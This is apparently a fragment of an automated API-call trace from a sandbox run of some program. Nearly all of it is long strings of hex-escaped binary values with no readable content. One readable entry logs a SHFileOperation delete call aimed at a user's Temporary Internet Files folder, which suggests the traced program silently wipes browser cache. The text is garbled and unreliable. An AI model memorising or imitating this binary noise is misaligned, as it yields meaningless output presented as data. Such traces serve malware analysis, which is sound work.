a45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\x